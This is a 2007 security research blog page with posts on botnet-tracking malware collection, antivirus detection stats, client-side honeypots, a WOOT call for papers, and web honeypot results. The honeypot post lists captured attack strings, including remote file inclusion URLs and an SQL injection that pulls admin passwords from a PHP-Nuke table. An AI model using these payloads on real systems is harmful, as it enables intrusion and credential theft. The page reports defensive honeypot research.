The SOCKS Diaries

Sunday, May 6. 2007
Something I should have blogged about several weeks ago: "The SOCKS Diaries" by William Salusky are a must-read.
Posted by Thorsten Holz in malware at 11:34 | Comments (0) | Trackbacks (0)

Collecting Malware via Botnet Tracking

Friday, May 4. 2007
I blogged about collecting malware via botnet tracking earlier in January this year. The whole system is now ready: when we track a botnet with botspy and find a URL, we download that URL and submit it to CWSandbox. The analysis report is then fed back into botspy, so we can also follow botnets that change the C&C server or install other kinds of remote control software. In total, we have collected 441 unique binaries that way during the last few weeks.

These binaries are typically some kind of bot or keylogger. The detection rate of common AV-software is typically not really good, presumably since they do not yet have a sample. The following report is for ClamAV:
----------- SCAN SUMMARY -----------
Known viruses: 113987
Engine version: 0.90.1
Scanned directories: 1
Scanned files: 441
Infected files: 153
Data scanned: 222.17 MB
Time: 73.564 sec (1 m 13 s)

Detected malware:
288: OK
17: Exploit.DCOM.Gen
14: Trojan.Mybot-1445
6: Trojan.Spybot.gen-2
4: Trojan.SdBot-4179
4: Trojan.IRCBot-798
3: W32.Parite.B
3: Trojan.IRC.Flood.AQ
3: Trojan.Ioffer
Posted by Thorsten Holz in malware at 08:31 | Comments (0) | Trackbacks (0)

Presentation on Client-Side Honeypots

Thursday, May 3. 2007
Bing Yuan just finished his thesis on Client-side Honeypots. While the tool itself is still not completely finished, his final presentation is available.

The basic idea of this thesis is to combine a component that drives Internet Explorer or other client-side applications (Word, PowerPoint, Winamp, Photoshop, ...) with CWSandbox. CWSandbox monitors the application in real-time and detects suspicious activities like creation of files, new processes, new registry keys, or similar activities. That way, information about client-side exploits can be captured - something that is not possible with regular, server-based honeypots.
Posted by Thorsten Holz in honeynets at 11:42 | Comments (0) | Trackback (1)

Call for Paper: 1st USENIX Workshop on Offensive Technologies (WOOT '07)

Wednesday, May 2. 2007
The Call for Paper for the 1st USENIX Workshop on Offensive Technologies (WOOT '07) is now available.

Important dates:
  • Paper submissions due: Thursday, June 7th, 2007, 11:59 p.m. PDT

  • Notification to authors: July 7th, 2007

  • Final papers due: July 31st, 2007

The workshop will be will be co-located with the 16th USENIX Security Symposium (Security '07), which will take place August 6–10, 2007.

About WOOT:
Progress in the field of computer security is driven by a symbiotic relationship between our understanding of attack and of defense. The USENIX Workshop on Offensive Technologies aims to bring together researchers and practitioners in system security to present research advancing the understanding of attacks on operating systems, networks, and applications.

Computer security is unique among systems disciplines in that practical details matter and concrete case studies keep the field grounded in practice. WOOT provides a forum for high-quality peer-reviewed papers for discussing tools and techniques for attack.

Submissions should reflect the state of the art in offensive computer security technology—either surveying previously poorly known areas or presenting entirely new attacks.

We are interested in work that could be presented at more traditional security forums, as well as more applied work that informs the field about the state of security practice in offensive techniques.

A significant goal is producing published artifacts that will inform future work in the field. Submissions will be peer-reviewed and shepherded as appropriate.
Posted by Thorsten Holz in administrativa at 11:21 | Comments (0) | Trackbacks (0)

Web-based Honeypot Decoys: Results II

Wednesday, May 2. 2007
Here are some more statistics regarding the data we have collected with the help of Michael Müter's web-based honeypot decoys. PHP-Nuke is the most attractive target, presumably due to it's large number of security vulnerabilities in the past and the large user-base. Commonly, we see file inclusion or SQL injection attempts. These attacks try often to install backdoors written in PHP or defacing tools like the one from r3v3ng4ns.

Attacks per module:
PHP-Nuke: 266 Hits [81.85%]
php Shell: 49 Hits [15.08%]
phpBB: 5 Hits [1.54%]
phpMyAdmin: 5 Hits [1.54%]

Attack Types:
File Inclusion: 167 Hits [51.38%]
SQL injection: 110 Hits [33.85%]
Injection: 30 Hits [9.23%]
WGET 14 Hits [4.31%]
XSS 4 Hits [1.23%]
Defacement attempt: 3 Hits [0.92%]
Directory traversal: 3 Hits [0.92%]

Most often used attack patterns (sanitized):
http://www.XXXzero.com/wp-admin/c.in? : 36 Hits [11.08%]
p0hh0nsee%\') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* : 34 Hits [10.46%]
http://XXXzero.com/c.in?? : 33 Hits [10.15%]
uname -a : 18 Hits [5.54%]
http://XXXbergsbuss.se/c.in? : 16 Hits [4.92%]
http://XXX.laughingllamas.com/fileupload/store/check.txt? 5 Hits [1.54%]

Captured Downloads:
Total number of captured tools: 36
Average size of a captured tool: 61.22kb
Total size of all captured tools: 2203.84kb
Posted by Thorsten Holz in honeynets at 08:32 | Comments (0) | Trackbacks (0)
« previous page   (Page 2 of 3, totaling 11 entries) » next page